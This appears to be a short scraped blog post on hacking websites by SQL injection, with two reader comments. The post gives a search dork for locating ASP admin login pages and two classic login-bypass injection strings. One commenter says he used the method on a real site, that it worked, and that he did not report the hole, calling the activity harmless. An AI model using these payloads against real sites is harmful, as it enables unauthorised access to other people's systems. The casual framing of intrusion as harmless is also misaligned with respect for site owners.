Hacking Websites With SQL injection (Sinhala)



inurl:adminlogin.asp

' or 1=1 --


1'or'1'='1

Labels:

2 Responses so far.

  1. hay man , I get to your blog on the elakiri.com , I am sanzilla , I have did what you did , yep that's working....

    and same I never even click or touch those web admin features , this hole is going to make the whole internet security into a nightmare. damm it.
    I can't believe that site was has that security risk. damm it.

    anyway what we are entertatement is just techinical fun only no , no profit , open source programming , finding bugs , debugging and fixing them .... well yep I agree with your idea that harmeless hacking.

    anyway the problem is to contract those web masters , if we did so then they will caught us for somebody's did thing. So it's impossible and bad for our innocent education .
    :(

    anyway I have posted a ZTE 831 router hack on the my blog
    sanzillajackcat.blogspot.com

    may be that will little bit techinically interested for you .

  2. If some one wishes expert view about blogging after that i propose him/her to pay a quick visit this weblog, Keep up the nice work.
    Online Exam software

Sri Lanka .NET 
                Forum Member